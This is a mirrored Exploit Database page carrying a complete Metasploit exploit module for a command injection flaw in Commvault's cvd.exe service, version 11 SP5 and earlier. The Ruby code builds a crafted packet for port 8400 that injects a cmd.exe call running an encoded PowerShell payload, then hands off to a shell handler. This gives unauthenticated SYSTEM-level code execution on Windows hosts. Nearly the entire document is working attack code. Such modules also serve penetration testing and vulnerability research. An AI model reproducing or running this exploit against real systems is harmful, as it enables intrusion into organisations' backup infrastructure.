Commvault Communications Service (cvd) – Command Injection (Metasploit)

• Exploit Database
• 19 阅读

• 作者： Metasploit
  日期： 2018-01-09
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/43472/

• ##
  # This module requires Metasploit: https://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core/exploit/powershell'
  
  class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Powershell
  
  def initialize(info={})
  super(update_info(info,
  'Name' => 'Commvault Communications Service (cvd) Command Injection',
  'Description'=> %q{
  This module exploits a command injection vulnerability
  discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5
  and v10). The vulnerability exists in the cvd.exe service and allows an
  attacker to execute arbitrary commands in the context of the service. By
  default, the Commvault Communications service installs and runs as SYSTEM in
  Windows and does not require authentication. This vulnerability was discovered
  in the Windows version. The Linux version wasn't tested.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
  ],
  'References' =>
  [
  ['URL', 'https://www.securifera.com/advisories/sec-2017-0001/']
  ],
  'Platform' => 'win',
  'Targets'=>
  [
  [ 'Commvault Communications Service (cvd) / Microsoft Windows 7 and higher',
  {
  'Arch' => [ARCH_X64, ARCH_X86]
  }
  ],
  ],
  'Privileged' => true,
  'DefaultTarget'=> 0,
  'DisclosureDate' => 'Dec 12 2017'))
  
  register_options([Opt::RPORT(8400)])
  
  end
  
  def exploit
  
  buf = build_exploit
  print_status("Connecting to Commvault Communications Service.")
  connect
  print_status("Executing payload")
  #Send the payload
  sock.put(buf)
  #Handle the shell
  handler
  disconnect
  
  end
  
  
  def build_exploit
  
  #Get encoded powershell of payload
  command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
  #Remove additional cmd.exe call
  psh = "powershell"
  idx = command.index(psh)
  command = command[(idx)..-1]
  
  #Build packet
  cmd_path = 'C:\Windows\System32\cmd.exe'
  msg_type = 9
  zero = 0
  payload = ""
  payload += make_nops(8)
  payload += [msg_type].pack('I>')
  payload += make_nops(328)
  payload += cmd_path
  payload += ";"
  payload += ' /c "'
  payload += command
  payload += '" && echo '
  payload += "\x00"
  payload += [zero].pack('I>')
  
  #Add length header and payload
  ret_data = [payload.length].pack('I>')
  ret_data += payload
  
  ret_data
  
  end
  end